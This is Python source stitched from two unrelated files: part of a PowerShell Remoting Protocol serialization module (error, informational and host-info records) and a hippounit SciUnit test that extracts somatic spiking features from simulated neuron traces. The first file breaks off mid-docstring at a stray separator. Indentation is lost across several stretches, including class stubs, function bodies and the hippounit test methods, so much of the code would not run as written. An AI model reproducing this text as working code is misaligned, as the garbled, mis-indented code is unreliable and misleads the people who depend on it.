    def __init__(self, **kwargs):
        """Represents a single parameter passed to a Command.

        [MS-PSRP] 2.2.3.13 Command Parameter
        https://msdn.microsoft.com/en-us/library/dd359709.aspx

        :param name: The name of the parameter, otherwise None
        :param value: The value of the parameter, can be any primitive type
            or Complex Object, Null for no value
        """
        super(CommandParameter, self).__init__()
        # Serialized as <N> (name) and <V> (value) elements.
        name_meta = ObjectMeta("S", name="N")
        value_meta = ObjectMeta(name="V")
        self._extended_properties = (
            ('name', name_meta),
            ('value', value_meta),
        )
        self.name = kwargs.get('name')
        self.value = kwargs.get('value')
# The host default data is serialized quite differently from the normal rules
# this contains some sub classes that are specific to the serialized form
class _HostDefaultData(ComplexObject):
    # Serialized wrapper for the raw-UI default values of a PSHost.  Each
    # entry of the host dict is wrapped in one of the small helper classes
    # below, which serialize as a {"T": type name, "V": value} pair.

    class _DictValue(ComplexObject):
        # Generic typed value entry (explicit type name + primitive value).

        def __init__(self, **kwargs):
            super(_HostDefaultData._DictValue, self).__init__()
            self._extended_properties = (
                ('value_type', ObjectMeta("S", name="T")),
                ('value', ObjectMeta(name="V")),
            )
            self.value_type = kwargs.get('value_type')
            self.value = kwargs.get('value')

    class _Color(ComplexObject):
        # Console color entry; stores the numeric value of the enum member.

        def __init__(self, color):
            super(_HostDefaultData._Color, self).__init__()
            self._extended_properties = (
                ('type', ObjectMeta("S", name="T")),
                ('color', ObjectMeta("I32", name="V")),
            )
            self.type = "System.ConsoleColor"
            # color is expected to expose .value (an enum-like object).
            self.color = color.value

    class _Coordinates(ComplexObject):
        # Host.Coordinates entry; x/y are carried in a generic sub-object.

        def __init__(self, coordinates):
            super(_HostDefaultData._Coordinates, self).__init__()
            self._extended_properties = (
                ('type', ObjectMeta("S", name="T")),
                ('value', ObjectMeta("ObjDynamic", name="V",
                                     object=GenericComplexObject)),
            )
            self.type = "System.Management.Automation.Host.Coordinates"
            self.value = GenericComplexObject()
            self.value.extended_properties['x'] = coordinates.x
            self.value.extended_properties['y'] = coordinates.y

    class _Size(ComplexObject):
        # Host.Size entry; width/height are carried in a generic sub-object.

        def __init__(self, size):
            super(_HostDefaultData._Size, self).__init__()
            self._extended_properties = (
                ('type', ObjectMeta("S", name="T")),
                ('value', ObjectMeta("ObjDynamic", name="V",
                                     object=GenericComplexObject)),
            )
            self.type = "System.Management.Automation.Host.Size"
            self.value = GenericComplexObject()
            self.value.extended_properties['width'] = size.width
            self.value.extended_properties['height'] = size.height

    def __init__(self, **kwargs):
        # Used by HostInfo to encapsulate the host info values inside a
        # special object required by PSRP
        super(_HostDefaultData, self).__init__()
        key_meta = ObjectMeta("I32", name="Key")
        self._extended_properties = (
            ('_host_dict', DictionaryMeta(name="data",
                                          dict_key_meta=key_meta)),
        )
        # raw_ui supplies the color/coordinate/size values read below.
        self.raw_ui = kwargs.get('raw_ui')

    @property
    def _host_dict(self):
        # Fixed, ordered mapping of index -> wrapped raw-UI value; the
        # indices are the keys PSRP expects in the serialized dictionary.
        return (
            (0, self._Color(self.raw_ui.foreground_color)),
            (1, self._Color(self.raw_ui.background_color)),
            (2, self._Coordinates(self.raw_ui.cursor_position)),
            (3, self._Coordinates(self.raw_ui.window_position)),
            (4, self._DictValue(value_type="System.Int32",
                                value=self.raw_ui.cursor_size)),
            (5, self._Size(self.raw_ui.buffer_size)),
            (6, self._Size(self.raw_ui.window_size)),
            (7, self._Size(self.raw_ui.max_window_size)),
            (8, self._Size(self.raw_ui.max_physical_window_size)),
            (9, self._DictValue(value_type="System.String",
                                value=self.raw_ui.window_title)),
        )
class HostInfo(ComplexObject):

    def __init__(self, **kwargs):
        """
        [MS-PSRP] 2.2.3.14 HostInfo
        https://msdn.microsoft.com/en-us/library/dd340936.aspx

        :param host: An implementation of pypsrp.host.PSHost that defines the
            local host
        """
        super(HostInfo, self).__init__()
        self._extended_properties = (
            ('_host_data', ObjectMeta("Obj", name="_hostDefaultData",
                                      optional=True, object=_HostDefaultData)),
            ('_is_host_null', ObjectMeta("B", name="_isHostNull")),
            ('_is_host_ui_null', ObjectMeta("B", name="_isHostUINull")),
            ('_is_host_raw_ui_null', ObjectMeta("B", name="_isHostRawUINull")),
            ('_use_runspace_host', ObjectMeta("B", name="_useRunspaceHost")),
        )
        self.host = kwargs.get('host', None)

    @property
    def _is_host_null(self):
        # No local host implementation was supplied.
        return self.host is None

    @property
    def _is_host_ui_null(self):
        # True when there is no host at all, or the host has no UI.
        return self.host is None or self.host.ui is None

    @property
    def _is_host_raw_ui_null(self):
        # True when there is no host, no UI, or the UI has no raw UI.
        if self.host is None or self.host.ui is None:
            return True
        return self.host.ui.raw_ui is None

    @property
    def _use_runspace_host(self):
        # Fall back to the runspace's host when none was supplied locally.
        return self.host is None

    @property
    def _host_data(self):
        # Host default data is only serializable when a raw UI exists.
        if self._is_host_raw_ui_null:
            return None
        return _HostDefaultData(raw_ui=self.host.ui.raw_ui)
class ErrorRecord(ComplexObject):

    def __init__(self, **kwargs):
        """
        [MS-PSRP] 2.2.3.15 ErrorRecord
        https://msdn.microsoft.com/en-us/library/dd340106.aspx

        Represents a PowerShell error record together with its optional
        invocation metadata.  All attribute values are read from **kwargs;
        anything omitted defaults to None.
        """
        super(ErrorRecord, self).__init__()
        self._types = [
            "System.Management.Automation.ErrorRecord",
            "System.Object"
        ]
        self._extended_properties = (
            ('exception', ObjectMeta(name="Exception", optional=True)),
            # NOTE(review): the constructor below sets 'target_info', not
            # 'target_object' - confirm how the serializer resolves this
            # property before relying on TargetObject round-tripping.
            ('target_object', ObjectMeta(name="TargetObject", optional=True)),
            # NOTE(review): both 'invocation' and 'extended_info_present'
            # map to the "SerializeExtendedInfo" element - verify the
            # duplicate mapping is intentional.
            ('invocation', ObjectMeta("B", name="SerializeExtendedInfo")),
            ('invocation_info', ObjectMeta("ObjDynamic", name="InvocationInfo",
                                           object=GenericComplexObject,
                                           optional=True)),
            ('fq_error', ObjectMeta("S", name="FullyQualifiedErrorId")),
            ('category', ObjectMeta("I32", name="ErrorCategory_Category")),
            ('activity', ObjectMeta("S", name="ErrorCategory_Activity",
                                    optional=True)),
            ('reason', ObjectMeta("S", name="ErrorCategory_Reason",
                                  optional=True)),
            ('target_name', ObjectMeta("S", name="ErrorCategory_TargetName",
                                       optional=True)),
            ('target_type', ObjectMeta("S", name="ErrorCategory_TargetType",
                                       optional=True)),
            ('message', ObjectMeta("S", name="ErrorCategory_Message",
                                   optional=True)),
            ('details_message', ObjectMeta("S", name="ErrorDetails_Message",
                                           optional=True)),
            ('action', ObjectMeta("S", name="ErrorDetails_RecommendedAction",
                                  optional=True)),
            # NOTE(review): 'script_stacktrace' and 'invocation_info' are
            # declared here but never assigned in __init__ - confirm the
            # ComplexObject base supplies defaults for unset properties.
            ('script_stacktrace', ObjectMeta(
                "S",
                name="ErrorDetails_ScriptStackTrace",
                optional=True
            )),
            ('extended_info_present', ObjectMeta(
                "B", name="SerializeExtendedInfo"
            )),
            ('invocation_name', ObjectMeta(
                "S",
                optional=True,
                name="InvocationInfo_InvocationName"
            )),
            ('invocation_bound_parameters', DictionaryMeta(
                name="InvocationInfo_BoundParameters",
                optional=True,
                dict_key_meta=ObjectMeta("S"),
                dict_types=[
                    "System.Management.Automation.PSBoundParametersDictionary",
                    "System.Collections.Generic.Dictionary`2[[System.String, "
                    "mscorlib, Version=4.0.0.0, Culture=neutral, "
                    "PublicKeyToken=b77a5c561934e089],"
                    "[System.Object, mscorlib, Version=4.0.0.0, "
                    "Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
                    "System.Object"
                ]
            )),
            ('invocation_unbound_arguments', ListMeta(
                name="InvocationInfo_UnboundArguments",
                optional=True,
                list_types=[
                    "System.Collections.Generic.List`1[["
                    "System.Object, mscorlib, Version=4.0.0.0, "
                    "Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
                    "System.Object"
                ]
            )),
            ('invocation_command_origin', ObjectMeta(
                "Obj",
                name="InvocationInfo_CommandOrigin",
                optional=True,
                object=CommandOrigin
            )),
            ('invocation_expecting_input', ObjectMeta(
                "B",
                name="InvocationInfo_ExpectingInput",
                optional=True
            )),
            ('invocation_line', ObjectMeta(
                "S",
                name="InvocationInfo_Line",
                optional=True
            )),
            ('invocation_offset_in_line', ObjectMeta(
                "I32",
                name="InvocationInfo_OffsetInLine",
                optional=True
            )),
            ('invocation_position_message', ObjectMeta(
                "S",
                name="InvocationInfo_PositionMessage",
                optional=True
            )),
            ('invocation_script_name', ObjectMeta(
                "S",
                name="InvocationInfo_ScriptName",
                optional=True
            )),
            ('invocation_script_line_number', ObjectMeta(
                "I32",
                name="InvocationInfo_ScriptLineNumber",
                optional=True
            )),
            ('invocation_history_id', ObjectMeta(
                "I64",
                name="InvocationInfo_HistoryId",
                optional=True
            )),
            ('invocation_pipeline_length', ObjectMeta(
                "I32",
                name="InvocationInfo_PipelineLength",
                optional=True
            )),
            ('invocation_pipeline_position', ObjectMeta(
                "I32",
                name="InvocationInfo_PipelinePosition",
                optional=True
            )),
            ('invocation_pipeline_iteration_info', ListMeta(
                name="InvocationInfo_PipelineIterationInfo",
                optional=True,
                list_value_meta=ObjectMeta("I32"),
                # NOTE(review): "System.In32[]" looks like a typo for
                # "System.Int32[]" - verify against the wire format before
                # changing, since these names are serialized verbatim.
                list_types=["System.In32[]", "System.Array", "System.Object"]
            )),
            ('command_type', ObjectMeta(
                "Obj",
                name="CommandInfo_CommandType",
                object=CommandType,
                optional=True,
            )),
            ('command_definition', ObjectMeta(
                "S",
                name="CommandInfo_Definition",
                optional=True,
            )),
            ('command_name', ObjectMeta(
                "S",
                name="CommandInfo_Name",
                optional=True
            )),
            ('command_visibility', ObjectMeta(
                "Obj",
                name="CommandInfo_Visibility",
                object=SessionStateEntryVisibility,
                optional=True
            )),
            ('pipeline_iteration_info', ListMeta(
                name="PipelineIterationInfo", optional=True,
                list_value_meta=ObjectMeta("I32"),
                list_types=[
                    "System.Collections.ObjectModel.ReadOnlyCollection`1[["
                    "System.Int32, mscorlib, Version=4.0.0.0, "
                    "Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
                    "System.Object"
                ]
            )),
        )
        self.exception = kwargs.get('exception')
        # NOTE(review): extended property above is 'target_object'; this
        # sets 'target_info' instead - likely mismatch, confirm.
        self.target_info = kwargs.get('target_info')
        self.invocation = kwargs.get('invocation')
        self.fq_error = kwargs.get('fq_error')
        self.category = kwargs.get('category')
        self.activity = kwargs.get('activity')
        self.reason = kwargs.get('reason')
        self.target_name = kwargs.get('target_name')
        self.target_type = kwargs.get('target_type')
        self.message = kwargs.get('message')
        self.details_message = kwargs.get('details_message')
        self.action = kwargs.get('action')
        self.pipeline_iteration_info = kwargs.get('pipeline_iteration_info')
        self.invocation_name = kwargs.get('invocation_name')
        self.invocation_bound_parameters = \
            kwargs.get('invocation_bound_parameters')
        self.invocation_unbound_arguments = \
            kwargs.get('invocation_unbound_arguments')
        self.invocation_command_origin = \
            kwargs.get('invocation_command_origin')
        self.invocation_expecting_input = \
            kwargs.get('invocation_expecting_input')
        self.invocation_line = kwargs.get('invocation_line')
        self.invocation_offset_in_line = \
            kwargs.get('invocation_offset_in_line')
        self.invocation_position_message = \
            kwargs.get('invocation_position_message')
        self.invocation_script_name = kwargs.get('invocation_script_name')
        self.invocation_script_line_number = \
            kwargs.get('invocation_script_line_number')
        self.invocation_history_id = kwargs.get('invocation_history_id')
        self.invocation_pipeline_length = \
            kwargs.get('invocation_pipeline_length')
        self.invocation_pipeline_position = \
            kwargs.get('invocation_pipeline_position')
        self.invocation_pipeline_iteration_info = \
            kwargs.get('invocation_pipeline_iteration_info')
        self.command_type = kwargs.get('command_type')
        self.command_definition = kwargs.get('command_definition')
        self.command_name = kwargs.get('command_name')
        self.command_visibility = kwargs.get('command_visibility')
        # Extended info is serialized only when invocation data was given.
        self.extended_info_present = self.invocation is not None
class InformationalRecord(ComplexObject):

    def __init__(self, **kwargs):
        """
        [MS-PSRP] 2.2.3.16 InformationalRecord (Debug/Warning/Verbose)
        https://msdn.microsoft.com/en-us/library/dd305072.aspx

        Base structure shared by the Debug, Warning, and Verbose record
        types: the record message plus, optionally, the invocation info of
        the command that produced the record. Every property is populated
        from **kwargs and defaults to None when absent.
        """
        super(InformationalRecord, self).__init__()
        self._types = [
            # Fixed typo: the serialized .NET type for this structure is
            # "InformationalRecord" (per the spec section above), not
            # "InformationRecord" (which names a different PowerShell type).
            "System.Management.Automation.InformationalRecord",
            "System.Object"
        ]
        # (python attribute, serialization metadata) pairs mapping each
        # attribute onto its CLIXML extended property.
        self._extended_properties = (
            ('message', ObjectMeta("S", name="InformationalRecord_Message")),
            ('invocation', ObjectMeta(
                "B", name="InformationalRecord_SerializeInvocationInfo"
            )),
            ('invocation_name', ObjectMeta(
                "S",
                optional=True,
                name="InvocationInfo_InvocationName"
            )),
            ('invocation_bound_parameters', DictionaryMeta(
                name="InvocationInfo_BoundParameters",
                optional=True,
                dict_key_meta=ObjectMeta("S"),
                dict_types=[
                    "System.Management.Automation.PSBoundParametersDictionary",
                    "System.Collections.Generic.Dictionary`2[[System.String, "
                    "mscorlib, Version=4.0.0.0, Culture=neutral, "
                    "PublicKeyToken=b77a5c561934e089],"
                    "[System.Object, mscorlib, Version=4.0.0.0, "
                    "Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
                    "System.Object"
                ]
            )),
            ('invocation_unbound_arguments', ListMeta(
                name="InvocationInfo_UnboundArguments",
                optional=True,
                list_types=[
                    "System.Collections.Generic.List`1[["
                    "System.Object, mscorlib, Version=4.0.0.0, "
                    "Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
                    "System.Object"
                ]
            )),
            ('invocation_command_origin', ObjectMeta(
                "Obj",
                name="InvocationInfo_CommandOrigin",
                optional=True,
                object=CommandOrigin
            )),
            ('invocation_expecting_input', ObjectMeta(
                "B",
                name="InvocationInfo_ExpectingInput",
                optional=True
            )),
            ('invocation_line', ObjectMeta(
                "S",
                name="InvocationInfo_Line",
                optional=True
            )),
            ('invocation_offset_in_line', ObjectMeta(
                "I32",
                name="InvocationInfo_OffsetInLine",
                optional=True
            )),
            ('invocation_position_message', ObjectMeta(
                "S",
                name="InvocationInfo_PositionMessage",
                optional=True
            )),
            ('invocation_script_name', ObjectMeta(
                "S",
                name="InvocationInfo_ScriptName",
                optional=True
            )),
            ('invocation_script_line_number', ObjectMeta(
                "I32",
                name="InvocationInfo_ScriptLineNumber",
                optional=True
            )),
            ('invocation_history_id', ObjectMeta(
                "I64",
                name="InvocationInfo_HistoryId",
                optional=True
            )),
            ('invocation_pipeline_length', ObjectMeta(
                "I32",
                name="InvocationInfo_PipelineLength",
                optional=True
            )),
            ('invocation_pipeline_position', ObjectMeta(
                "I32",
                name="InvocationInfo_PipelinePosition",
                optional=True
            )),
            ('invocation_pipeline_iteration_info', ListMeta(
                name="InvocationInfo_PipelineIterationInfo",
                optional=True,
                list_value_meta=ObjectMeta("I32"),
                # Fixed typo: "System.In32[]" is not a .NET type; the
                # element type of this array is System.Int32.
                list_types=["System.Int32[]", "System.Array", "System.Object"]
            )),
            ('command_type', ObjectMeta(
                "Obj",
                name="CommandInfo_CommandType",
                object=CommandType,
                optional=True,
            )),
            ('command_definition', ObjectMeta(
                "S",
                name="CommandInfo_Definition",
                optional=True,
            )),
            ('command_name', ObjectMeta(
                "S",
                name="CommandInfo_Name",
                optional=True
            )),
            ('command_visibility', ObjectMeta(
                "Obj",
                name="CommandInfo_Visibility",
                object=SessionStateEntryVisibility,
                optional=True
            )),
            ('pipeline_iteration_info', ListMeta(
                name="InformationalRecord_PipelineIterationInfo",
                optional=True,
                list_value_meta=ObjectMeta("I32"),
                list_types=[
                    "System.Collections.ObjectModel.ReadOnlyCollection`1[["
                    "System.Int32, mscorlib, Version=4.0.0.0, "
                    "Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
                    "System.Object"
                ]
            ))
        )
        self.message = kwargs.get('message')
        self.pipeline_iteration_info = kwargs.get('pipeline_iteration_info')
        self.invocation_name = kwargs.get('invocation_name')
        self.invocation_bound_parameters = \
            kwargs.get('invocation_bound_parameters')
        self.invocation_unbound_arguments = \
            kwargs.get('invocation_unbound_arguments')
        self.invocation_command_origin = \
            kwargs.get('invocation_command_origin')
        self.invocation_expecting_input = \
            kwargs.get('invocation_expecting_input')
        self.invocation_line = kwargs.get('invocation_line')
        self.invocation_offset_in_line = \
            kwargs.get('invocation_offset_in_line')
        self.invocation_position_message = \
            kwargs.get('invocation_position_message')
        self.invocation_script_name = kwargs.get('invocation_script_name')
        self.invocation_script_line_number = \
            kwargs.get('invocation_script_line_number')
        self.invocation_history_id = kwargs.get('invocation_history_id')
        self.invocation_pipeline_length = \
            kwargs.get('invocation_pipeline_length')
        self.invocation_pipeline_position = \
            kwargs.get('invocation_pipeline_position')
        self.invocation_pipeline_iteration_info = \
            kwargs.get('invocation_pipeline_iteration_info')
        self.command_type = kwargs.get('command_type')
        self.command_definition = kwargs.get('command_definition')
        self.command_name = kwargs.get('command_name')
        self.command_visibility = kwargs.get('command_visibility')
        # Unconditionally False: invocation info is not serialized by
        # default (note this overrides any 'invocation' kwarg).
        self.invocation = False
class HostMethodIdentifier(Enum):
def __init__(self, **kwargs):
"""
[MS-PSRP] 2.2.3.17 Host Method Identifier
https://msdn.microsoft.com/en-us/library/dd306624.aspx
Represents methods to be executed on a host.
:param value: The method identifier to | |
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
#from builtins import str
from builtins import range
from quantities.quantity import Quantity
import sciunit
from sciunit import Test,Score
try:
from sciunit import ObservationError
except:
from sciunit.errors import ObservationError
import hippounit.capabilities as cap
from sciunit.utils import assert_dimensionless# Converters.
from sciunit.scores import BooleanScore,ZScore # Scores.
import pkg_resources
try:
import numpy
except:
print("NumPy not loaded.")
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
#from neuron import h
import collections
import efel
import os
import multiprocessing
import multiprocessing.pool
import functools
import math
from scipy import stats
import json
from hippounit import plottools
import collections
try:
import pickle as pickle
except:
import pickle
import gzip
try:
import copyreg
except:
import copyreg
from types import MethodType
from quantities import mV, nA, ms, V, s
from hippounit import scores
def _pickle_method(method):
    """Reduce a bound method to a picklable (callable, args) pair.

    Registered with copyreg so multiprocessing can ship bound methods
    to worker processes; _unpickle_method performs the inverse.
    """
    return _unpickle_method, (
        method.__func__.__name__,
        method.__self__,
        method.__self__.__class__,
    )
def _unpickle_method(func_name, obj, cls):
for cls in cls.mro():
try:
func = cls.__dict__[func_name]
except KeyError:
pass
else:
break
return func.__get__(obj, cls)
# Register the bound-method reducer so multiprocessing can pickle methods.
# The old form tried `copy_reg.pickle(...)` first, but `copy_reg` is never
# imported in this module (both import branches above bind `copyreg`), so
# that branch always raised NameError and the bare `except` silently fell
# through to this call. Keep only the working registration.
copyreg.pickle(MethodType, _pickle_method, _unpickle_method)
class SomaticFeaturesTest(Test):
"""
Tests some somatic features under current injection of increasing amplitudes.
Parameters
----------
config : dict
dictionary loaded from a JSON file, containing the parameters of the simulation
observation : dict
dictionary loaded from a JSON file, containing the experimental mean and std values for the features to be tested
force_run : boolean
If True and the pickle files containing the model's response to the simulation exists, the simulation won't be run again, traces are loaded from the pickle file
base_directory : str
Results will be saved here
show_plot : boolean
If False, plots are not displayed but still saved
save_all : boolean
If False, only the JSON files containing the absolute feature values, the feature error scores and the final scores, and a log file are saved, but the figures and pickle files are not.
specify_data_set : str
When set to a string, output will be saved into subdirectory (within the model_name subderotory) named like this. This makes it possible to run the validation on a specific model, against different data sets, and save the results separately.
"""
def __init__(self,
observation = {} ,
config = {},
name="Somatic features test" ,
force_run=False,
base_directory=None,
show_plot=True,
save_all = True,
specify_data_set = ''):
Test.__init__(self,observation,name)
self.required_capabilities += (cap.ReceivesSquareCurrent_ProvidesResponse,)
self.force_run = force_run
self.show_plot = show_plot
self.save_all = save_all
self.config = config
self.base_directory = base_directory
self.path_temp_data = None #added later, because model name is needed
self.path_figs = None
self.path_results = None
self.npool = multiprocessing.cpu_count() - 1
self.logFile = None
self.test_log_filename = 'test_log.txt'
self.specify_data_set = specify_data_set #this is added to the name of the directory (somaticfeat), so tests runs using different data sets can be saved into different directories
plt.close('all') #needed to avoid overlapping of saved images when the test is run on multiple models in a for loop
#with open('./stimfeat/PC_newfeat_No14112401_15012303-m990803_stimfeat.json') as f:
#self.config = json.load(f, object_pairs_hook=collections.OrderedDict)
description = "Tests some somatic features under current injection of increasing amplitudes."
score_type = scores.ZScore_somaticSpiking
def create_stimuli_list(self):
#with open('./stimfeat/PC_newfeat_No14112401_15012303-m990803_stimfeat.json') as f:
#config = json.load(f, object_pairs_hook=collections.OrderedDict)
stimulus_list=[]
stimuli_list=[]
stimuli_names = []
stimuli_names=list(self.config['stimuli'].keys())
for i in range (0, len(stimuli_names)):
stimulus_list.append(stimuli_names[i])
stimulus_list.append(self.config['stimuli'][stimuli_names[i]]['Amplitude'])
stimulus_list.append(self.config['stimuli'][stimuli_names[i]]['Delay'])
stimulus_list.append(self.config['stimuli'][stimuli_names[i]]['Duration'])
stimulus_list.append(self.config['stimuli'][stimuli_names[i]]['StimSectionName'])
stimulus_list.append(self.config['stimuli'][stimuli_names[i]]['StimLocationX'])
stimulus_list.append(self.config['stimuli'][stimuli_names[i]]['Type'])
stimulus_list.append(self.config['stimuli'][stimuli_names[i]]['RecSectionName'])
stimulus_list.append(self.config['stimuli'][stimuli_names[i]]['RecLocationX'])
stimuli_list.append(stimulus_list)
stimulus_list=[]
return stimuli_list
def create_features_list(self, observation):
feature_list=[]
features_list=[]
features_names=(list(observation.keys()))
for i in range (0, len(features_names)):
feature_list.append(features_names[i])
feature_list.append(observation[features_names[i]]['Std'])
feature_list.append(observation[features_names[i]]['Mean'])
feature_list.append(observation[features_names[i]]['Stimulus'])
feature_list.append(observation[features_names[i]]['Type'])
features_list.append(feature_list)
feature_list=[]
return features_names, features_list
    def run_stim(self, model, stimuli_list):
        """Apply one stimulus to the model and return the recorded trace.

        `stimuli_list` is a single entry from `create_stimuli_list`. For a
        "SquarePulse" stimulus, returns {stimulus_name: [t, v]}; any other
        stimulus type returns None. Traces are cached as gzipped pickles
        under `self.path_temp_data` and reloaded unless `self.force_run`.
        """
        stimulus_name, amplitude, delay, duration, stim_section_name, stim_location_x, stim_type, rec_section_name, rec_location_x = stimuli_list
        traces_result={}
        # Optional data-set tag keeps runs against different data sets in
        # separate cache directories.
        if self.specify_data_set != '':
            specify_data_set = '_' + self.specify_data_set
        else:
            specify_data_set = self.specify_data_set
        if self.base_directory:
            self.path_temp_data = self.base_directory + 'temp_data/' + 'somaticfeat' + specify_data_set + '/' + model.name + '/'
        else:
            self.path_temp_data = model.base_directory + 'temp_data/' + 'somaticfeat' + specify_data_set + '/'
        try:
            if not os.path.exists(self.path_temp_data) and self.save_all:
                os.makedirs(self.path_temp_data)
        except OSError as e:
            # errno 17 == EEXIST: another worker created the directory
            # concurrently; anything else is a real failure.
            if e.errno != 17:
                raise
            pass
        if stim_type == "SquarePulse":
            file_name = self.path_temp_data + stimulus_name + '.p'
            # Re-simulate when forced, or when no cached trace exists yet.
            if self.force_run or (os.path.isfile(file_name) is False):
                t, v = model.get_vm(float(amplitude), float(delay), float(duration), stim_section_name, stim_location_x, rec_section_name, rec_location_x)
                traces_result[stimulus_name]=[t,v]
                if self.save_all:
                    # NOTE(review): the GzipFile handle is never explicitly
                    # closed; this relies on refcounting to flush — confirm.
                    pickle.dump(traces_result, gzip.GzipFile(file_name, "wb"))
            else:
                traces_result = pickle.load(gzip.GzipFile(file_name, "rb"))
        else:
            traces_result=None
        return traces_result
def analyse_traces(self, stimuli_list, traces_results, features_list):
feature_name, target_sd, target_mean, stimulus, feature_type = features_list
target_sd=float(target_sd)
target_mean=float(target_mean)
feature_result={}
trace = {}
for i in range (0, len(traces_results)):
for key, value in traces_results[i].items():
stim_name=key
if stim_name == stimulus:
trace['T'] = traces_results[i][stim_name][0]
trace['V'] = traces_results[i][stim_name][1]
for i in range (0, len(stimuli_list)):
if stimuli_list[i][0]==stimulus:
trace['stim_start'] = [float(stimuli_list[i][2])]
trace['stim_end'] = [float(stimuli_list[i][2])+float(stimuli_list[i][3])]
traces = [trace]
#print traces
efel_results = efel.getFeatureValues(traces,[feature_type])
feature_values=efel_results[0][feature_type]
if feature_values is not None and feature_values.size != 0:
if (feature_type == 'AP_rise_time' or feature_type == 'AP_amplitude' or feature_type == 'AP_duration_half_width' or feature_type == 'AP_begin_voltage'
or feature_type == 'AP_rise_rate' or feature_type == 'fast_AHP' or feature_type == 'AP_begin_time' or feature_type == 'AP_begin_width' or feature_type == 'AP_duration'
or feature_type == 'AP_duration_change' or feature_type == 'AP_duration_half_width_change' or feature_type == 'fast_AHP_change' or feature_type == 'AP_rise_rate_change' or feature_type == 'AP_width'):
"""
In case of features that are AP_begin_time/AP_begin_index, the 1st element of the resulting vector, which corresponds to AP1, is ignored
This is because the AP_begin_time/AP_begin_index feature often detects the start of the stimuli instead of the actual beginning of AP1
"""
feature_mean=numpy.mean(feature_values[1:])
feature_sd=numpy.std(feature_values[1:])
else:
feature_mean=numpy.mean(feature_values)
feature_sd=numpy.std(feature_values)
else:
feature_mean = float('nan')
feature_sd = float('nan')
#feature_mean=numpy.mean(feature_values)
#feature_sd=numpy.std(feature_values)
feature_result={feature_name:{'feature values': feature_values,
'feature mean': feature_mean,
'feature sd': feature_sd}}
return feature_result
    def create_figs(self, model, traces_results, features_names, feature_results_dict, observation):
        """Save overview figures: overlaid traces, per-stimulus subplots,
        and a model-vs-experiment comparison of absolute feature values."""
        if self.specify_data_set != '':
            specify_data_set = '_' + self.specify_data_set
        else:
            specify_data_set = self.specify_data_set
        if self.base_directory:
            self.path_figs = self.base_directory + 'figs/' + 'somaticfeat' + specify_data_set + '/' + model.name + '/'
        else:
            self.path_figs = model.base_directory + 'figs/' + 'somaticfeat' + specify_data_set + '/'
        try:
            if not os.path.exists(self.path_figs) and self.save_all:
                os.makedirs(self.path_figs)
        except OSError as e:
            # errno 17 == EEXIST: directory already created elsewhere.
            if e.errno != 17:
                raise
            pass
        if self.save_all:
            print("The figures are saved in the directory: ", self.path_figs)
        # Figure 1: all recorded traces overlaid on a single axis.
        plt.figure(1)
        #key=sorted()
        for i in range (0, len(traces_results)):
            for key, value in traces_results[i].items():
                plt.plot(traces_results[i][key][0], traces_results[i][key][1], label=key)
        plt.legend(loc=2)
        if self.save_all:
            plt.savefig(self.path_figs + 'traces' + '.pdf', dpi=600,)
        # Figure 2: one subplot per stimulus in a 2-column grid, zoomed
        # around the stimulus window.
        columns = 2
        width_ratios=[1]*columns
        frames = len(traces_results)
        rows = int(numpy.ceil(frames/float(columns)))
        height_ratios=[1]*rows
        #axs=[]
        # A4-sized canvas (figsize is in inches: mm / 25.4).
        fig = plt.figure(figsize = (210/25.4, 297/25.4))
        gs = matplotlib.gridspec.GridSpec(rows, columns, height_ratios=height_ratios, width_ratios=width_ratios)
        gs.update(top=0.97, bottom=0.04, left=0.07, right=0.97, hspace=0.75, wspace=0.3)
        #fig, axes = plt.subplots(nrows=int(round(len(traces_results)/2.0)), ncols=2)
        #fig.tight_layout()
        for i in range (0, len(traces_results)):
            for key, value in traces_results[i].items():
                #plt.subplot(round(len(traces_results)/2.0),2,i+1)
                plt.subplot(gs[i])
                #axs.append(fig.add_subplot(gs[i]))
                plt.plot(traces_results[i][key][0], traces_results[i][key][1])
                plt.title(key)
                plt.xlabel("ms")
                plt.ylabel("mV")
                # 200 ms margin on each side of the stimulus window.
                minx = float(self.config['stimuli'][key]['Delay']) - 200
                maxx = float(self.config['stimuli'][key]['Delay']) + float(self.config['stimuli'][key]['Duration']) + 200
                plt.xlim(minx, maxx)
                #plt.tick_params(labelsize=15)
        #gs.tight_layout(fig)
        #fig = plt.gcf()
        #fig.set_size_inches(12, 10)
        if self.save_all:
            plt.savefig(self.path_figs + 'traces_subplots' + '.pdf', dpi=600, bbox_inches='tight')
        # Figure 3: absolute feature values, model (blue) vs experiment (red).
        axs = plottools.tiled_figure("absolute features", figs={}, frames=1, columns=1, orientation='page',
                                     height_ratios=None, top=0.97, bottom=0.05, left=0.25, right=0.97, hspace=0.1, wspace=0.2)
        plt.gcf().set_size_inches(210/25.4, 297/25.4*2 )
        label_added = False
        for i in range (len(features_names)):
            feature_name=features_names[i]
            y=i
            # Attach legend labels only on the first pair of error bars.
            if not label_added:
                axs[0].errorbar(feature_results_dict[feature_name]['feature mean'], y, xerr=feature_results_dict[feature_name]['feature sd'], marker='o', color='blue', label = model.name)
                axs[0].errorbar(float(observation[feature_name]['Mean']), y, xerr=float(observation[feature_name]['Std']), marker='o', color='red', label = 'experiment')
                label_added = True
            else:
                axs[0].errorbar(feature_results_dict[feature_name]['feature mean'], y, xerr=feature_results_dict[feature_name]['feature sd'], marker='o', color='blue')
                axs[0].errorbar(float(observation[feature_name]['Mean']), y, xerr=float(observation[feature_name]['Std']), marker='o', color='red')
        axs[0].yaxis.set_ticks(list(range(len(features_names))))
        axs[0].set_yticklabels(features_names)
        axs[0].set_ylim(-1, len(features_names))
        axs[0].set_title('Absolute Features')
        lgd=plt.legend(bbox_to_anchor=(1.0, 1.0), loc = 'upper left')
        if self.save_all:
            plt.savefig(self.path_figs + 'absolute_features' + '.pdf', dpi=600, bbox_extra_artists=(lgd,), bbox_inches='tight')
def generate_prediction(self, model, verbose=False):
"""Implementation of sciunit.Test.generate_prediction."""
efel.reset()
self.observation = collections.OrderedDict(sorted(self.observation.items()))
global model_name_soma
model_name_soma = model.name
pool = multiprocessing.Pool(self.npool, maxtasksperchild=1)
stimuli_list=self.create_stimuli_list()
run_stim_ = functools.partial(self.run_stim, model)
